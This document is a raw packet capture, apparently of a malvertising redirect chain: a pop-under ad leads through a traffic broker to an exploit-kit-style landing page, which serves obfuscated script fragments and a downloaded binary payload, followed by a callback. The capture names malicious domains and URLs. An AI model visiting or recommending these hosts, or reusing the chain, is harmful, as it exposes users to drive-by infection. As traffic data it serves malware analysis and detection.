2020-02-19 19:23:32.510874 IP 192.168.4.239.49481 > 3.226.77.126.80: Flags [P.], seq 1:259, ack 1, win 258, length 258: HTTP: GET /go/141657/437555 HTTP/1.1
E..*”.@………..M~.I.P….U.$.P….e..GET /go/141657/437555 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: ps.popcash.net
Connection: Keep-Alive
2020-02-19 19:23:32.511531 IP 192.168.4.239.49482 > 3.226.77.126.80: Flags [.], ack 1, win 258, length 0
E..(“.@………..M~.J.P]L.$CG..P………….
2020-02-19 19:23:32.754783 IP 3.226.77.126.80 > 192.168.4.239.49481: Flags [.], ack 259, win 237, length 0
E..(..@.?.…M~…..P.IU.$…..P….%..
2020-02-19 19:23:33.299047 IP 3.226.77.126.80 > 192.168.4.239.49481: Flags [P.], seq 1:485, ack 259, win 237, length 484: HTTP: HTTP/1.1 200 OK
E…..@.?.(..M~…..P.IU.$…..P…….HTTP/1.1 200 OK
Date: Wed, 19 Feb 2020 23:23:32 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Server: nginx
Vary: Accept-Encoding
Content-Encoding: gzip
106
2020-02-19 19:23:33.352360 IP 192.168.4.239.49481 > 3.226.77.126.80: Flags [P.], seq 259:610, ack 485, win 257, length 351: HTTP: GET /ad/ad?p=141657&w=437555&t=c4e2c17140489e34&r=&vw=1024&vh=674 HTTP/1.1
E…”.@………..M~.I.P….U.&.P….,..GET /ad/ad?p=141657&w=437555&t=c4e2c17140489e34&r=&vw=1024&vh=674 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://ps.popcash.net/go/141657/437555
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: ps.popcash.net
Connection: Keep-Alive
2020-02-19 19:23:33.593011 IP 3.226.77.126.80 > 192.168.4.239.49481: Flags [.], ack 610, win 245, length 0
E..(..@.?.*…M~…..P.IU.&…..P…….
2020-02-19 19:23:34.186865 IP 3.226.77.126.80 > 192.168.4.239.49481: Flags [P.], seq 485:1053, ack 610, win 245, length 568: HTTP: HTTP/1.1 303 See Other
E....@.?.'...M~.....P.IU.&.....P...
…HTTP/1.1 303 See Other
Date: Wed, 19 Feb 2020 23:23:33 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 224
Connection: keep-alive
Server: nginx
Location: http://synth.website/3v1qk8qwd3fsdfg4?keyword=Other&cost=0.00201&currency=USD&external_id=76317964614&ad_campaign_id=257385&source=popcash&sub_id_1=437555&sub_id_2=Other
2020-02-19 19:23:35.386396 IP 192.168.4.239.49485 > 188.127.249.55.80: Flags [P.], seq 1:439, ack 1, win 258, length 438: HTTP: GET /3v1qk8qwd3fsdfg4?keyword=Other&cost=0.00201&currency=USD&external_id=76317964614&ad_campaign_id=257385&source=popcash&sub_id_1=437555&sub_id_2=Other HTTP/1.1
E…#.@…Z……..7.M.P.{#…G.P…….GET /3v1qk8qwd3fsdfg4?keyword=Other&cost=0.00201&currency=USD&external_id=76317964614&ad_campaign_id=257385&source=popcash&sub_id_1=437555&sub_id_2=Other HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://ps.popcash.net/go/141657/437555
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Host: synth.website
2020-02-19 19:23:35.387016 IP 192.168.4.239.49486 > 188.127.249.55.80: Flags [.], ack 1, win 258, length 0
E..(#.@…\y…….7.N.P.<.4.G..P….|……..
2020-02-19 19:23:35.628706 IP 188.127.249.55.80 > 192.168.4.239.49485: Flags [.], ack 439, win 237, length 0
E..(. @.?..a…7…..P.M..G..{%RP…9…
2020-02-19 19:23:36.440209 IP 188.127.249.55.80 > 192.168.4.239.49485: Flags [P.], seq 1:1022, ack 439, win 237, length 1021: HTTP: HTTP/1.1 302 Found
E..%.!@.?..c…7…..P.M..G..{%RP…….HTTP/1.1 302 Found
Server: nginx
Date: Wed, 19 Feb 2020 23:23:35 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
Cache-Control: no-cache, no-store, must-revalidate,post-check=0,pre-check=0
Expires: 0
Last-Modified: Wed, 19 Feb 2020 23:23:35 GMT
Location: http://keli.adultessvensk.info/17rh2ccau1jrsid/bolivia-crystal-bikini
Pragma: no-cache
Set-Cookie: _subid=17rh2ccau1jrsid;Expires=Saturday, 21-Mar-2020 23:23:35 GMT;Max-Age=2678400;Path=/
Set-Cookie: 506ef=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1wic3RyZWFtc1wiOntcIjIxNlwiOjE1ODIxNTQ2MTUsXCIzODdcIjoxNTgyMTU0NjE1fSxcImNhbXBhaWduc1wiOntcIjM1XCI6MTU4MjE1NDYxNSxcIjI0XCI6MTU4MjE1NDYxNX0sXCJ0aW1lXCI6MTU4MjE1NDYxNX0ifQ.gTBkma-wFYGontS72ZtYJxogznbdHRY3YC9Win3HBps;Expires=Saturday, 21-Mar-2020 23:23:35 GMT;Max-Age=2678400;Path=/
2020-02-19 19:23:37.681552 IP 192.168.4.239.49487 > 185.159.80.223.80: Flags [P.], seq 1:339, ack 1, win 258, length 338: HTTP: GET /17rh2ccau1jrsid/bolivia-crystal-bikini HTTP/1.1
E..z#.@….O……P..O.Pob.’..o9P…G…GET /17rh2ccau1jrsid/bolivia-crystal-bikini HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://ps.popcash.net/go/141657/437555
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Host: keli.adultessvensk.info
2020-02-19 19:23:37.682097 IP 192.168.4.239.49488 > 185.159.80.223.80: Flags [.], ack 1, win 258, length 0
E..(#.@………..P..P.PoB.3.m.&P………….
2020-02-19 19:23:37.923817 IP 185.159.80.223.80 > 192.168.4.239.49487: Flags [.], ack 339, win 237, length 0
E..(.5@.?…..P……P.O..o9ob.yP….?..
2020-02-19 19:23:38.553794 IP 185.159.80.223.80 > 192.168.4.239.49487: Flags [.], seq 1:1327, ack 339, win 237, length 1326: HTTP: HTTP/1.1 200 OK
E..V.6@.?..U..P……P.O..o9ob.yP…….HTTP/1.1 200 OK
Date: Wed, 19 Feb 2020 23:23:37 GMT
Server: Apache/2.4.6 (CentOS) mpm-itk/2.4.7-04 OpenSSL/1.0.2k-fips PHP/5.4.16
X-Powered-By: PHP/5.4.16
P3P: CP="NOI ADM DEV COM NAV OUR STP"
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html
2020-02-19 19:23:40.682556 IP 185.159.80.223.80 > 192.168.4.239.49487: Flags [P.], seq 79108:79362, ack 723, win 245, length 254: HTTP
E..&.x@.?..C..P……P.O…<ob..P…….}
catch(fufuf)
{
try
{
S(z);
}
catch (gju)
{
redir("http://keli.adultessvensk.info/?dfe1f19d3cef7d6e8e6d8caa13b6be14u")
}
redir("http://keli.adultessvensk.info/?dfe1f19d3cef7d6e8e6d8caa13b6be14u")
};
0
2020-02-19 19:23:40.682871 IP 192.168.4.239.49487 > 185.159.80.223.80: Flags [.], ack 79362, win 258, length 0
E..(#M@….m……P..O.Pob…..:P………….
2020-02-19 19:23:40.809916 IP 192.168.4.239.49487 > 185.159.80.223.80: Flags [P.], seq 723:1212, ack 79362, win 258, length 489: HTTP: POST /17rh2ccau1jrsid/?e975da3dfc774fc8a654e1dd23e51a48fe6205y HTTP/1.1
E…#N@………..P..O.Pob…..:P…….POST /17rh2ccau1jrsid/?e975da3dfc774fc8a654e1dd23e51a48fe6205y HTTP/1.1
Host: keli.adultessvensk.info
Content-Length: 320
Cache-Control: no-cache
Cookie: __vbs=1
……………………. ..8lg..
-..z.^…..…….cc..J.. v..Z….t.:Z…Z…Z…Z…Z…..].Z…h…Z… V….b: z2….9.”h….g….Z……T b…g.r….Z…..FZ…..B. zz^.9d……I. ……..Vi………. ..](2…2…..T<..H.e-G.u2H..T^c.6sG{…m.. .lo.%’.Ox….:..rJ.x..e8….E.v%..ou.T.”..…….]…&… .^PI
2020-02-19 19:23:41.051083 IP 185.159.80.223.80 > 192.168.4.239.49487: Flags [.], ack 1212, win 254, length 0
E..(.y@.?..@..P……P.O…:ob..P…….
2020-02-19 19:23:41.341860 IP 192.168.4.239.137 > 188.127.249.55.137: NBT UDP PACKET(137): QUERY; REQUEST; UNICAST
E..N#O@….…….7…..:]…………. CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..!..
2020-02-19 19:23:41.378226 IP 185.159.80.223.80 > 192.168.4.239.49487: Flags [.], seq 79362:80688, ack 1212, win 254, length 1326: HTTP: HTTP/1.1 200 OK
E..V.z@.?…..P……P.O…:ob..P…)m..HTTP/1.1 200 OK
Date: Wed, 19 Feb 2020 23:23:40 GMT
Server: Apache/2.4.6 (CentOS) mpm-itk/2.4.7-04 OpenSSL/1.0.2k-fips PHP/5.4.16
X-Powered-By: PHP/5.4.16
Content-Transfer-Encoding: binary
Expires: 0
Cache-Control: must-revalidate
Pragma: public
Content-Length: 431358
Content-Type: application/octet-stream
2020-02-19 19:23:46.640532 IP 192.168.4.239.49487 > 185.159.80.223.80: Flags [P.], seq 1212:1391, ack 511040, win 258, length 179: HTTP: POST /17rh2ccau1jrsid/?e975da3dfc774fc8a654e1dd23e51a48fe6205y&00000111&11 HTTP/1.1
E…$v@………..P..O.Pob….;xP…….POST /17rh2ccau1jrsid/?e975da3dfc774fc8a654e1dd23e51a48fe6205y&00000111&11 HTTP/1.1
Host: keli.adultessvensk.info
Content-Length: 0
Cache-Control: no-cache
Cookie: __vbs=1
2020-02-19 19:23:46.881461 IP 185.159.80.223.80 > 192.168.4.239.49487: Flags [.], ack 1391, win 262, length 0
E..(..@.?…..P……P.O..;xob..P…….
2020-02-19 19:23:47.194702 IP 185.159.80.223.80 > 192.168.4.239.49487: Flags [P.], seq 511040:511513, ack 1391, win 262, length 473: HTTP: HTTP/1.1 404 Not Found
E…..@.?…..P……P.O..;xob..P…i…HTTP/1.1 404 Not Found
Date: Wed, 19 Feb 2020 23:23:46 GMT
Server: Apache/2.4.6 (CentOS) mpm-itk/2.4.7-04 OpenSSL/1.0.2k-fips PHP/5.4.16
X-Powered-By: PHP/5.4.16
Content-Length: 259
Content-Type: text/html
E…$.@….Z….-….T..v……(P…k………….^M..’……….]..”d …G.Z.7JM^...<./.=.5…
.’…..+.#.,.$. .
.@.2.j.8…….I…………..vapershotz.xyz……….
…………………………….
2020-02-19 19:23:58.925578 IP 45.147.200.7.443 > 192.168.4.239.49492: Flags [.], seq 1:1327, ack 166, win 237, length 1326
2020-02-19 19:23:58.925805 IP 45.147.200.7.443 > 192.168.4.239.49492: Flags [.], seq 1327:2653, ack 166, win 237, length 1326